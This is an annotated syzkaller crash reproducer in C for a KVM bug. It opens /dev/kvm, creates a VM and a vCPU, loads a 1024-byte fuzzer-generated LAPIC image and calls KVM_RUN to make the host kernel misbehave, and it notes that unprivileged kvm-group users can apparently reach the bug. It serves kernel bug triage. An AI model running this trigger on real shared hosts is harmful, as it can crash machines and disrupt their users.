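// https://syzkaller.appspot.com/bug?id=83aa676a823eeb2855ab831541b2c8175904c281
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Reproducer for the syzkaller KVM bug linked above.
//
// Syscall sequence, in order:
//   1. openat("/dev/kvm")
//   2. KVM_CREATE_VM                        -> VM fd
//   3. KVM_CREATE_IRQCHIP on the VM fd       (in-kernel interrupt controller)
//   4. KVM_CREATE_VCPU id=2                  -> vCPU fd
//   5. KVM_SET_LAPIC with a 1024-byte fuzzer-generated APIC register image
//   6. KVM_RUN
// Nothing else is configured: no guest memory slot is registered and no
// general-purpose or segment registers are set, so KVM_RUN is entered with
// the vCPU in whatever state KVM_CREATE_VCPU left it, plus this LAPIC image.
//
// SAFETY / HANDLING
//   * This is a crash PoC: its purpose is to make the *host* kernel
//     misbehave. Run it only on a disposable kernel (nested test VM or a
//     scratch box), never on a shared host.
//   * It needs read/write access to /dev/kvm. On most distributions that is
//     granted by membership of the `kvm` group, i.e. the code path it
//     exercises is presumably reachable by any such user, not only root -
//     keep that in mind when triaging severity.
//   * Syzkaller reproducers deliberately never stop on error: a failed step
//     leaves its descriptor at -1 and the later ioctls just fail with EBADF.
//     That replay semantics is kept here; failures are only reported on
//     stderr so the operator can tell whether KVM_RUN was actually reached.
//     The one exception is the scratch mmap, without which the program would
//     segfault on the first memcpy - it now exits with a diagnostic instead.
//   * The 1024-byte blob is fuzzer output, not a meaningful APIC state. Do
//     not "clean it up": the trigger may depend on any byte of it, and on
//     the vCPU id being 2 rather than 0.
//
// NOTE(review): the published copy of this file had the header names
// stripped from its eight #include lines; they are restored below to the
// standard syzkaller reproducer set (only stdint.h, string.h, unistd.h and
// sys/syscall.h are strictly needed by the code).
#define _GNU_SOURCE

#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

// Syzkaller's fixed address map: one guard page below, 16 MiB of RWX scratch
// memory that holds every syscall argument, one guard page above. Values
// carry the `ul` suffix on purpose: they travel through syscall()'s varargs
// and must be passed as full machine words, never as int.
#define GUARD_LOW_ADDR   0x1ffff000ul
#define SCRATCH_ADDR     0x20000000ul
#define SCRATCH_LEN      0x1000000ul
#define GUARD_HIGH_ADDR  0x21000000ul
#define PAGE_LEN         0x1000ul
#define PROT_NONE_RAW    0ul          // PROT_NONE
#define PROT_RWX_RAW     7ul          // PROT_READ|PROT_WRITE|PROT_EXEC
#define MAP_FLAGS_RAW    0x32ul       // MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE

// Where inside the scratch region the two pointer arguments live.
#define KVM_PATH_ADDR    (SCRATCH_ADDR + 0x000ul)
#define LAPIC_BLOB_ADDR  (SCRATCH_ADDR + 0x100ul)

#define AT_FDCWD_RAW     0xffffffffffffff9cul   // AT_FDCWD (-100)

// KVM ioctl request numbers (KVMIO = 0xAE), spelled out so the reproducer
// does not depend on <linux/kvm.h>.
#define KVM_CREATE_VM_REQ      0xae01ul      // _IO(KVMIO, 0x01)
#define KVM_CREATE_IRQCHIP_REQ 0xae60ul      // _IO(KVMIO, 0x60)
#define KVM_CREATE_VCPU_REQ    0xae41ul      // _IO(KVMIO, 0x41)
#define KVM_SET_LAPIC_REQ      0x4400ae8ful  // _IOW(KVMIO, 0x8f, 1024-byte struct kvm_lapic_state)
#define KVM_RUN_REQ            0xae80ul      // _IO(KVMIO, 0x80)

#define VCPU_ID          2ul
#define LAPIC_BLOB_LEN   1024

// Fuzzer-generated struct kvm_lapic_state image (1024 bytes of APIC register
// space). Kept as a string literal so it stays byte-for-byte the syzkaller
// output; the static assert below guards against transcription slips.
static const char lapic_blob[] =
    "\xb4\x64\x74\xf8\x15\xe8\xd5\x53\x5f\x08\x87\xc4\x43\x35\xcc\x82\x4d\xc6"
    "\x12\x1b\xc7\x2a\x77\xf5\x32\xff\x5d\xad\x4d\x64\x3a\x9c\xab\x29\xd2\x31"
    "\x0e\x04\xbe\x14\xeb\x26\xc0\xaf\x49\x85\xfe\x45\xe3\xb3\xb0\x68\x0b\x3e"
    "\xc9\x27\x25\xd7\x4b\x97\x16\xe0\xf7\xc3\x11\x9a\x2c\x9a\x0a\xe6\x5f\xf4"
    "\x77\x2e\x2e\x12\x73\x3c\xb0\x13\xc4\x30\x8f\xe4\x08\x63\x48\x07\x47\xc0"
    "\xa7\xdd\xb9\x36\x1b\x15\x78\x01\x5c\xa1\xbb\x2c\x16\x77\xeb\xae\x09\x6f"
    "\x08\x34\x54\x76\xf5\x67\x44\x38\x42\x94\x6e\xd9\x46\x43\x4c\x75\x91\x6d"
    "\x1d\xb8\x3f\xe3\x05\x92\x0d\xe6\x5b\xfa\xf9\xbd\x94\x06\x72\x21\x68\x46"
    "\xcb\x16\xb8\xae\x67\xcd\x3a\xff\xc6\x13\x75\x38\x1f\x91\xb3\xb9\xf1\xcc"
    "\x5e\x38\xca\xfe\x52\x39\xae\xe7\x1d\xcd\x48\x1f\xbe\x1e\xcd\x25\x47\x90"
    "\x24\xa6\x76\xb2\x1b\x3a\xdc\x5e\x46\x3c\x9e\xff\xba\xad\x44\x69\xa7\x46"
    "\x97\xc2\x8f\xb9\xbe\xef\xa6\xa5\xd7\x36\x71\x2a\x55\xeb\x91\x10\xc2\xcf"
    "\x79\x64\x06\x2b\xa8\xcb\xc1\xc0\x38\xe8\x4f\x0f\x5d\xb7\xfc\x70\x53\x11"
    "\x8b\xf5\x22\x1e\x3e\xfa\x6f\xc3\xed\xb5\xd0\xca\x3c\xde\x70\x54\xdd\x07"
    "\x51\xa3\x32\x52\x0a\xa8\x47\x8b\x17\x75\xd5\x52\xc5\xcc\x24\xd3\xc2\xdf"
    "\x9e\xb3\x33\xe5\xca\x3a\xa0\x6c\x1c\x2c\xf8\x52\x67\x14\xf5\xca\xff\x2f"
    "\x55\xb4\x19\x76\xfc\x20\xb6\x4f\x1f\xc6\x1d\x5b\x44\xf5\x09\x53\x58\x4d"
    "\xb1\x1b\x7f\x89\xec\x68\x09\x8e\xaf\xa4\x8c\xeb\xd6\x88\x2a\x18\x25\xd3"
    "\x21\x30\xa3\x1a\xbf\xea\xfd\x19\x87\x31\x78\x79\xe2\x9a\xc5\x1b\x93\xc9"
    "\x65\x9e\x02\x3f\xff\x3d\xdb\x5e\x39\xdd\x19\xcc\x3e\xf1\xd8\x83\xc7\x8b"
    "\x9e\x07\x3d\x08\xa9\x19\x7f\xb3\x71\x7d\xf2\x38\xb9\x83\x18\x31\x21\x4b"
    "\x18\x66\x93\xbe\x9d\xd2\x56\x8b\xb7\x72\x72\xe8\x0d\xf5\xdf\xed\x03\xe8"
    "\xc4\x67\x62\x7b\xed\xfb\xd9\x33\x59\xa9\xf7\x9a\x3a\xa3\x7e\x87\x3d\xc1"
    "\x35\x7b\x37\xb4\x3d\x81\x3e\xa8\x52\x67\xb0\xdc\x8b\x1c\x4c\xc5\x1b\xd9"
    "\x85\x32\x88\x33\xbe\xb2\x67\x9b\x7f\xb7\x62\x55\x5b\xbe\xa2\xda\x93\x6b"
    "\x36\xf8\xf1\x67\x3f\xd5\xf6\x06\xb2\xb6\xeb\x23\xb7\x2b\xf9\x47\x20\x6e"
    "\x8d\xbf\xeb\x40\xca\x6f\x26\x5a\x34\x85\xc8\x44\x6e\x0f\x0d\xa6\x52\x86"
    "\x0b\x88\x32\x80\x73\xd2\x28\x2c\x14\xb4\x8a\x77\x74\xe6\x27\x54\xa9\x68"
    "\xb6\x0e\x92\x20\x5e\x8f\xaf\xcd\xd7\x0a\x55\xc3\xc4\xd1\xa4\x82\x1f\xf4"
    "\x4e\x6e\x36\x81\xf1\x5a\xe0\x91\x26\x2e\x3a\x32\x90\xa2\x4d\x8c\xea\xe3"
    "\x0e\xbb\xf9\xd2\x42\x87\xbb\x8a\x5d\x73\xc6\x08\xd4\x7d\x28\x7f\x9e\x71"
    "\x6c\xf0\x2b\x47\x96\xa8\x3f\xb0\xc0\x5e\x45\xb8\x9d\xe9\xef\x8b\xce\x83"
    "\x4e\x6d\x7a\x0b\xe6\xe3\x0d\x2c\x66\xcb\x6e\x64\x0c\xb0\x18\x98\x45\x4a"
    "\xd3\x61\xbc\x07\x01\xd8\xfe\x56\xf3\x35\xe2\x37\x3b\x2c\xde\x56\x92\xdb"
    "\x04\x69\x1c\xc4\xa6\x89\x03\x42\x72\xa8\xe0\x86\xa3\x2c\xe7\x06\x1b\x4f"
    "\x79\xfa\x8a\xfb\xb4\x8a\x6c\xe4\xb6\x2b\xdc\x44\xaf\x01\x3d\x78\x98\x04"
    "\x57\xe1\xfa\x61\xeb\x92\x04\x81\x86\x06\xf4\xc3\xb0\x3c\x0f\x33\xcd\x2a"
    "\x84\x1a\xc9\xbc\x2b\x73\x15\x1a\x96\xe3\x1a\xb9\x9e\x6e\xc9\x69\xb5\xf2"
    "\xc3\xed\xd5\xf9\xab\xc6\x98\x45\xe4\x87\xaf\x99\x27\x58\xba\x44\x53\x68"
    "\xda\x93\xda\xe1\xd4\x43\x60\xd5\x2a\x53\x4a\x88\x27\x6b\x8a\xaf\x34\x98"
    "\x41\xd8\xa4\x78\x8c\x60\x40\x86\x18\x43\x7c\x44\x23\x08\xdb\xf7\x0e\xfe"
    "\xda\x2e\x54\xe9\xb9\xe4\xfe\x5f\x76\x99\x7c\x9d\xcb\x94\x5a\x26\xbd\x75"
    "\x74\x8c\x85\xd1\x9c\xa8\xb9\x92\x64\xdc\xe5\x05\x80\xe8\xb0\x3f\xe4\x79"
    "\x8e\x57\x50\xd4\xdb\xda\x40\x1d\xad\x7d\xf3\x1e\x9a\x7a\x6a\x3a\x83\xbf"
    "\xbd\xfb\x53\x94\xab\xd5\x81\xac\x08\x24\xfb\xcd\x75\xd2\xf5\x20\x5c\x0b"
    "\x7c\x91\x88\xe6\xf2\x6b\xfd\x97\x73\x4d\x9a\x20\x43\x3f\x6c\xdb\xa9\xd1"
    "\x4a\x5f\x32\xa4\xd9\x7a\x57\xf4\x60\x3b\x21\x14\x6f\xd1\xae\xbf\x08\x2e"
    "\x86\x3d\x46\x3c\x22\x4a\xd6\x23\xc1\x7d\x80\x43\xd3\xbf\x08\x3f\x03\x22"
    "\x40\x8d\xd6\xea\xd6\x91\x5a\xc6\xa4\x22\x2a\xb5\x14\x80\xeb\x6e\x11\xa8"
    "\x91\x33\x48\x21\x95\x15\x17\x0d\x9d\xf9\x0d\x72\xd7\x36\x3b\xbd\xa3\xe3"
    "\x27\xd1\x9f\x98\xc0\xa8\x56\xf9\x80\x76\x38\x0e\x78\x8e\x60\x2e\x8a\x2a"
    "\xe0\xa1\x93\x07\x86\x87\x4d\xc2\x1a\x2e\x99\xab\xda\x15\xf3\x54\x57\xcf"
    "\x1d\xcb\x44\x0c\x4b\x41\x35\x0d\x0e\xda\x35\x2a\xad\x7f\x57\xa0\xad\xc8"
    "\xa6\x91\x51\xfc\xca\xef\xc6\xe9\xb7\x70\xc9\xac\x12\x4d\xa0\x64\x60\x63"
    "\x5e\xd2\x1c\x4c\x11\xcd\x1a\x8e\xc7\x78\x06\x4c\x9f\x62\xef\xba\x29\x27"
    "\x82\x8b\x23\xf9\x4b\x16\x61\x9a\x55\x20\x73\x1c\x2c\x40\xab\x85\x83\xc9"
    "\xf2\xe7\x32\x33\xd7\x4b\x84\xf4\x87\x7c\xe6\xb3\x5b\xb1\x18\x03";

_Static_assert(sizeof(lapic_blob) - 1 == LAPIC_BLOB_LEN,
               "LAPIC image must be exactly 1024 bytes (struct kvm_lapic_state)");

// Reports a failed raw syscall on stderr without aborting, to keep
// syzkaller's "replay every step regardless" semantics.
// ret:  value returned by syscall(); -1 means failure with errno set.
// step: human-readable name of the step, used as the perror() prefix.
// Returns ret unchanged so it can be used inline.
static long report(long ret, const char *step)
{
    if (ret == -1) {
        perror(step);
    }
    return ret;
}

int main(void)
{
    // Set up syzkaller's address map. The scratch mapping is mandatory: every
    // later step writes into it, so bail out if it cannot be created rather
    // than faulting on the first memcpy.
    report(syscall(__NR_mmap, GUARD_LOW_ADDR, PAGE_LEN, PROT_NONE_RAW,
                   MAP_FLAGS_RAW, (long)-1, 0ul),
           "mmap(guard page below scratch)");
    if (syscall(__NR_mmap, SCRATCH_ADDR, SCRATCH_LEN, PROT_RWX_RAW,
                MAP_FLAGS_RAW, (long)-1, 0ul) == -1) {
        perror("mmap(scratch region)");
        return 1;
    }
    report(syscall(__NR_mmap, GUARD_HIGH_ADDR, PAGE_LEN, PROT_NONE_RAW,
                   MAP_FLAGS_RAW, (long)-1, 0ul),
           "mmap(guard page above scratch)");

    // Descriptor slots start at -1: a failed step leaves its slot untouched
    // and the ioctls that depend on it fail with EBADF, exactly as in the
    // generated reproducer.
    long kvm_fd = -1;
    long vm_fd = -1;
    long vcpu_fd = -1;
    long res;

    // 1. openat(AT_FDCWD, "/dev/kvm", 0, 0). The path is placed in scratch
    //    memory because syzkaller passes every pointer argument that way.
    memcpy((void *)KVM_PATH_ADDR, "/dev/kvm\000", 9);
    res = report(syscall(__NR_openat, AT_FDCWD_RAW, KVM_PATH_ADDR, 0ul, 0ul),
                 "openat(/dev/kvm)");
    if (res != -1) {
        kvm_fd = res;
    }

    // 2. KVM_CREATE_VM -> VM fd.
    res = report(syscall(__NR_ioctl, kvm_fd, KVM_CREATE_VM_REQ, 0ul),
                 "KVM_CREATE_VM");
    if (res != -1) {
        vm_fd = res;
    }

    // 3. In-kernel interrupt controller for the VM.
    report(syscall(__NR_ioctl, vm_fd, KVM_CREATE_IRQCHIP_REQ, 0ul),
           "KVM_CREATE_IRQCHIP");

    // 4. KVM_CREATE_VCPU with id 2 (not 0 - part of the reproducer) -> vCPU fd.
    res = report(syscall(__NR_ioctl, vm_fd, KVM_CREATE_VCPU_REQ, VCPU_ID),
                 "KVM_CREATE_VCPU");
    if (res != -1) {
        vcpu_fd = res;
    }

    // 5. Install the fuzzer-generated LAPIC register image.
    memcpy((void *)LAPIC_BLOB_ADDR, lapic_blob, LAPIC_BLOB_LEN);
    report(syscall(__NR_ioctl, vcpu_fd, KVM_SET_LAPIC_REQ, LAPIC_BLOB_ADDR),
           "KVM_SET_LAPIC");

    // 6. Run the vCPU once. If the kernel is affected, this is the step that
    //    should trip it.
    report(syscall(__NR_ioctl, vcpu_fd, KVM_RUN_REQ, 0ul), "KVM_RUN");
    return 0;
}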